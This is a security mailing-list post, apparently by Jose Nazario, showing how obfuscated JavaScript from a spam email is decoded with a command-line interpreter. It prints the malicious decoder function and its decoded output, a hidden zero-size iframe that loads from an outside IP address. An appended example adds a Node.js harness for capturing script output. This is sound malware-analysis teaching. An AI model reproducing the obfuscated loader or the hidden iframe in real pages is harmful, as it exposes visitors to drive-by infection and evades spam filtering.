ps, this decodes to the following HTML snippet (i have deliberately obfuscated the tags):

[iframe src=http://63.134.215.88/a/ height=0 width=0][/iframe]

here's how i arrived at that.

there's a free command line JavaScript interpreter that can help with evaluating malicious javascript. i did the port for OpenBSD years ago, and the source is available for all at http://www.njs-javascript.org/

i extracted the javascript functions from the forwarded message and loaded them into a file, bad2.js:

$ cat bad2.js
function dc(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,6,22,2,4,19,56,49
,24,46,0,0,0,0,0,0,61,0,5,58,48,51,17,18,13,16,11,20,27,47,60,53,8,57,14,7,9
,55,36,31,1,40,15,0,0,0,0,44,0,33,41,52,62,32,50,28,43,10,21,12,26,42,59,38,
39,34,29,23,45,3,37,25,30,35,54);for(j=Math.ceil(l/b);j>0;j--){r='';for(
i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=
String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}
//document.write(r)     // JN no document object
print(r);               // JN so print it instead
}
}
dc('wfNDs5kfAsYOsLkoHSrcj0bqiRbvJGbvF96vK3Qqrzbq4h8aHukE3Ugc82waGEgDFUkoj9woifNDs5kfAMT')

i made some modifications to deal with the fact that there is no document object in this context. see the "JN" comments.

now when i use the javascript toolkit, i can actually run it. it will print the decoded string object 'r':

$ js bad2.js
[iframe src=http://63.134.215.88/a/ height=0 width=0][/iframe]

(tags obfuscated)

this is what your browser would see and load. unless your spam/scam detection engine also ran the javascript, it wouldn't see that. hence, obfuscation.

hopefully this helps people out there decode questionable javascript in the future.

________
jose nazario, ph.d.
jose@xxxxxxxxxx
http://monkey.org/~jose/
http://infosecdaily.net/
http://www.wormblog.com/
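
An added example, not part of the original post or of the njs project: instead of editing each sample to swap document.write for print, an analysis harness can supply stub document and print objects that record whatever the script writes. It assumes Node.js and its vm module rather than the js command used in the post; captureWrites, defang and the XOR-encoded sample are hypothetical names and data constructed for this illustration.

```javascript
// Added example: record what an obfuscated script writes, without editing it.
const vm = require("vm");

// Run `source` in a fresh context whose document.write, document.writeln and
// print only append to a buffer. vm is not a security boundary, so run this
// inside a disposable analysis VM, as with any live sample.
function captureWrites(source, timeoutMs = 1000) {
  const out = [];
  const record = (...args) => { out.push(args.map(String).join("")); };
  const sandbox = {
    document: { write: record, writeln: (...args) => record(...args, "\n") },
    print: record,
  };
  vm.runInNewContext(source, sandbox, { timeout: timeoutMs });
  return out.join("");
}

// Make decoded markup inert for a report, using the bracket style of the post.
function defang(html) {
  return html.replace(/</g, "[").replace(/>/g, "]");
}

// Constructed sample (not the script from the post): markup pointing at a
// documentation-range address, XOR-encoded so the tag never appears in source.
const PLAIN = "<iframe src=http://192.0.2.1/a/ height=0 width=0></iframe>";
const KEY = 0x5a;
const ENCODED = Array.from(PLAIN, (c) => c.charCodeAt(0) ^ KEY);
const SAMPLE =
  `var e=[${ENCODED}],r='';for(var i=0;i<e.length;i++)` +
  `{r+=String.fromCharCode(e[i]^${KEY})}document.write(r)`;

console.log("static match on 'iframe':", SAMPLE.includes("iframe"));
console.log("decoded:", defang(captureWrites(SAMPLE)));
```

The timeout stops a sample that loops forever, and any call the sample makes to an object the stubs do not define raises a ReferenceError that names the next browser API the script expected.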